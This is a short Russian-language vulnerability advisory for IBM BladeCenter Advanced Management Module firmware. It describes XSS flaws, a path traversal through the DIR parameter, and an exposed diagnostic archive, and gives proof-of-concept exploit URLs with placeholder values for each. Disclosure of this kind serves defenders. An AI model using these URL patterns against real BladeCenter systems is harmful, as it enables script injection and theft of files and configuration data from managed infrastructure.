Программа:
IBM BladeCenter Advanced Management Module Firmware 1.x
IBM BladeCenter Advanced Management Module Firmware 2.x
Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку, получить доступ к конфиденциальной информации и выполнить произвольный
код на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в
различных сценариях. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://[host]/private/cindefn.php?INDEX=[code]&VLANID=&IPADDR=[code]
http://[host]/private/power_management_policy_options.php?domain=3[code]
http://[host]/private/pm_temp.php?view=6&mod_type=3&slot=3[code]
http://[host]/private/power_module.php?view=4&mod_type=4&slot=3[code]
http://[host]/private/pm_temp.php?view=6&mod_type=3&slot=3[code]
http://[host]/private/blade_leds.php?WEBINDEX=3[code]
http://[host]/private/ipmi_bladestatus.php?SLOT=3[code]&save=1
2) Уязвимость возникает из-за ошибки в проверке входных данных в параметре "DIR"
сценарием private/file_management.php. Атакующий может получить содержимое
произвольных файлов на целевой системе.
Эксплоит:
http://[BLADECENTER]/private/file_management.php?DIR=/../../../tmp/etc
3) Уязвимость возникает из-за ошибки в проверке входных данных при обработке
HTTP запросов (например, в "private/sdc.tgz").
Эксплоит:
http://[BLADECENTER]/private/sdc.tgz
